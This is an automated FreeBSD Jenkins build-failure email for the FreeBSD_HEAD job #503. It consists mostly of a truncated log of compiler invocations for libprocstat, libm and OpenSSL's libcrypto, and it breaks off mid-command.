2016 03:50:05 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id BFE791DC3; Sat, 30 Jul 2016 03:50:05 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 12320196; Sat, 30 Jul 2016 03:50:06 +0000 (UTC) Date: Sat, 30 Jul 2016 03:50:05 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1232028214.60.1469850606012.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1396805328.57.1469848098913.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1396805328.57.1469848098913.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Build failed in Jenkins: FreeBSD_HEAD #503 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: FAILURE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 03:50:05 -0000 See ------------------------------------------ [...truncated 77974 lines...] cc -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib/libprocstat -= D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.udf.o -MTudf.o -std=3Dgnu99 -= fstack-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -= Wno-unused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-ari= th -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-par= ameter -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant= -decls -Wold-style-definition -Wno-pointer-sign -Wmissing-variable-declarat= ions -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const= -variable -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/li= bprocstat/udf.c -o udf.o --- lib/msun__L --- --- s_nanl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_nanl.So -MTs_nan= l.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun= /ld80/s_nanl.c -o s_nanl.So --- lib/libprocstat__L --- --- zfs/zfs.So --- --- zfs.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/libpr= ocstat/zfs/../../../sys/cddl/compat/opensolaris -I/builds/workspace/FreeBSD= _HEAD/src/lib/libprocstat/zfs/../../../cddl/compat/opensolaris/include -I/b= uilds/workspace/FreeBSD_HEAD/src/lib/libprocstat/zfs/../../../cddl/compat/o= pensolaris/lib/libumem -I/builds/workspace/FreeBSD_HEAD/src/lib/libprocstat= /zfs/../../../cddl/contrib/opensolaris/lib/libzpool/common -I/builds/worksp= ace/FreeBSD_HEAD/src/lib/libprocstat/zfs/../../../sys/cddl/contrib/opensola= ris/common/zfs -I/builds/workspace/FreeBSD_HEAD/src/lib/libprocstat/zfs/../= ../../sys/cddl/contrib/opensolaris/uts/common/fs/zfs -I/builds/workspace/Fr= eeBSD_HEAD/src/lib/libprocstat/zfs/../../../sys/cddl/contrib/opensolaris/ut= s/common -I/builds/workspace/FreeBSD_HEAD/src/lib/libprocstat/zfs/../../../= sys/cddl/contrib/opensolaris/uts/common/sys -I/builds/workspace/FreeBSD_HEA= D/src/lib/libprocstat/zfs/../../../cddl/contrib/opensolaris/head -I/builds/= workspace/FreeBSD_HEAD/src/lib/libprocstat/zfs/.. -DNEED_SOLARIS_BOOLEAN = -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno= -tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unus= ed-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno= -switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argumen= ts -c /builds/workspace/FreeBSD_HEAD/src/lib/libprocstat/zfs/../zfs.c -o z= fs.So --- lib/msun__L --- --- s_nextafterl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_nextafterl.So -M= Ts_nextafterl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -We= rror -Wno-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plu= s-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unused-valu= e -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-= unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-paramet= er -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/= src/lib/msun/src/s_nextafterl.c -o s_nextafterl.So --- s_nexttoward.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_nexttoward.So -M= Ts_nexttoward.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -We= rror -Wno-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plu= s-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unused-valu= e -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-= unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-paramet= er -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/= src/lib/msun/src/s_nexttoward.c -o s_nexttoward.So --- secure/lib/libcrypto__L --- --- b_sock.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.b_sock.o -MTb_sock.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b_sock.= c -o b_sock.o --- lib/msun__L --- --- s_roundl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_roundl.So -MTs_r= oundl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_roundl.c -o s_roundl.So --- lib/libprocstat__L --- --- cd9660.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.cd9660.So -MTcd= 9660.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wal= l -Wno-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-pr= ototypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch= -Wshadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winline -Wnest= ed-externs -Wredundant-decls -Wold-style-definition -Wno-pointer-sign -Wmis= sing-variable-declarations -Wthread-safety -Wno-empty-body -Wno-string-plus= -int -Wno-unused-const-variable -Qunused-arguments -c /builds/workspace/F= reeBSD_HEAD/src/lib/libprocstat/cd9660.c -o cd9660.So --- lib/msun__L --- --- s_sinl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_sinl.So -MTs_sin= l.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun= /src/s_sinl.c -o s_sinl.So --- lib/libprocstat__L --- --- common_kvm.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.common_kvm.So -= MTcommon_kvm.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Wer= ror -Wall -Wno-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmi= ssing-prototypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings = -Wswitch -Wshadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winlin= e -Wnested-externs -Wredundant-decls -Wold-style-definition -Wno-pointer-si= gn -Wmissing-variable-declarations -Wthread-safety -Wno-empty-body -Wno-str= ing-plus-int -Wno-unused-const-variable -Qunused-arguments -c /builds/wor= kspace/FreeBSD_HEAD/src/lib/libprocstat/common_kvm.c -o common_kvm.So --- lib/msun__L --- --- s_tanhl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_tanhl.So -MTs_ta= nhl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_tanhl.c -o s_tanhl.So --- secure/lib/libcrypto__L --- --- bf_buff.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bf_buff.o -MTbf_buff.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bf_buff= .c -o bf_buff.o --- lib/msun__L --- --- s_tanl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_tanl.So -MTs_tan= l.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun= /src/s_tanl.c -o s_tanl.So --- lib/libprocstat__L --- --- core.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.core.So -MTcore= .So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wall -W= no-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-protot= ypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Ws= hadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winline -Wnested-e= xterns -Wredundant-decls -Wold-style-definition -Wno-pointer-sign -Wmissing= -variable-declarations -Wthread-safety -Wno-empty-body -Wno-string-plus-int= -Wno-unused-const-variable -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/lib/libprocstat/core.c -o core.So --- lib/msun__L --- --- s_truncl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_truncl.So -MTs_t= runcl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_truncl.c -o s_truncl.So --- w_cabsl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.w_cabsl.So -MTw_ca= bsl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/w_cabsl.c -o w_cabsl.So --- secure/lib/libcrypto__L --- --- bf_nbio.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bf_nbio.o -MTbf_nbio.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bf_nbio= .c -o bf_nbio.o --- lib/msun__L --- --- catrig.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.catrig.So -MTcatri= g.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun= /src/catrig.c -o catrig.So --- secure/lib/libcrypto__L --- --- bf_null.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bf_null.o -MTbf_null.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bf_null= .c -o bf_null.o --- lib/libprocstat__L --- --- libprocstat.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.libprocstat.So = -MTlibprocstat.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -W= error -Wall -Wno-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -W= missing-prototypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-string= s -Wswitch -Wshadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winl= ine -Wnested-externs -Wredundant-decls -Wold-style-definition -Wno-pointer-= sign -Wmissing-variable-declarations -Wthread-safety -Wno-empty-body -Wno-s= tring-plus-int -Wno-unused-const-variable -Qunused-arguments -c /builds/w= orkspace/FreeBSD_HEAD/src/lib/libprocstat/libprocstat.c -o libprocstat.So --- lib/msun__L --- --- catrigf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.catrigf.So -MTcatr= igf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/catrigf.c -o catrigf.So --- secure/lib/libcrypto__L --- --- bio_cb.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bio_cb.o -MTbio_cb.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bio_cb.= c -o bio_cb.o --- bio_err.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= 